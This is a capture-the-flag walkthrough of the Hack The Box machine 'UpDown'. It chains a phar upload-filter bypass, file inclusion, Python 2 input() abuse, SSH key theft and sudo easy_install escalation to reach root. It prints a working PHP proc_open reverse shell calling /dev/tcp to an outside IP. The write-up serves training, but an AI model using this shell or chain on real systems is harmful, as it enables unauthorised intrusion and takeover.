UpDown - Hack The Box
Enumeration
Nmap
Initial Nmap scan revealed SSH and HTTP ports open.
Web Enumeration
Website revealed that the domain is siteisup.htb, thus I added it to /etc/hosts file.
Directory Brute Forcing
Directory brute forcing with common names revealed that there is directory named /dev. And inside it there is a .git file available.
Git Dumper
I used git-dumper tool to dump files using publicly accessible .git file.
It revealed php files and .htaccess file which is a php configuration file.
Reading the .htaccess file revealed that there is required header Special-Dev to access dev site.
Subdomain Brute Force
After analyzing the files from dev site, I applied subdomain enumeration to find the subdomain that the dev site is running on. As expected it returned ‘dev’ subdomain.
Burp Update
Then I opened Burp Suite and set match-replace rule to add Special-Dev header to every request.
Analyzing Dev Website
At first I checked index.php, it is simply getting page parameter and concatting .php at the end and rendering this page. If no parameter is given it is running checker.php file.
Then analyzed checker.php file. It checks for extension and filters any known extension that can be malicious. Then creates a folder under the uploads folder using MD5 of timestamp and puts the file inside it. And after reading line by line and checking connectivity, it deletes the file.
It is filtering known extensions but there is no filter for phar extensions. Phar is special format that can be used to include files inside compressed zip files (For example: include ‘phar:///path/to/file.zip/file.php’;). But zip or other known extension are blocked. So I created a phpinfo() file and compressed the file with .mto extension.
I know that index.php includes files that are given with page parameter. So giving it a phar link reveals php info page.
I tested some reverse shells and it did not work. Then checking phpinfo page, I understood that some functions are disabled. So either I can check meanually or I can run dfunc-bypasser script to check if there is known function that is not excluded.
I first need to update dfunc-bypasser script to send requests with Special-Dev header.
Then running it revealed proc_open function is allowed, and it is malicious. It can be used to run shell commands. You can check out documentation for more information.
Exploitation
Creating proc_open reverse shell
After learning proc_open is allowed, I created a reverse shell script as below:
<?php
$descspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.12/1234 0>&1'";
$proc = proc_open($cmd, $descspec, $pipes);
?>
Uploading and Getting Reverse Shell
Then zipped the shell using .mto extension and uploaded it.
Visiting the site while listening with netcat gets me reverse shell as www-data.
Python2 Code Execution
As www-data, I can not read user.txt on the home page. I tried some privilege escalation methods which did not work. Then found dev folder inside home folder. Inside it there was a python2 script that gets an input from the user and a binary that calls that python script as developer user.
Python 2 passes any input that is given via input() function to the eval function, so we can run shell commands. To test it I ran id command and the output showed that my id is developer’s id but my group id is www-data.
Then simply run /bin/bash and got the shell.
SSH
But I still can not read user.txt because my group is www-data and the user.txt is owned by root and the developer group can read it.
Thus, I copied ~/.ssh/id_rsa to login via SSH as the developer user.
And then simply logged in.
Privilege Escalation
sudo -l
Running sudo -l revealed I can run easy_install as sudo. And this file is deprecated python installer file, it simply gets a name and installs it.
GTFOBins
After some research, I found GTFOBins page for easy_install is available. So I simply applied the steps and got the root shell.
Pwned
The machine was fully compromised.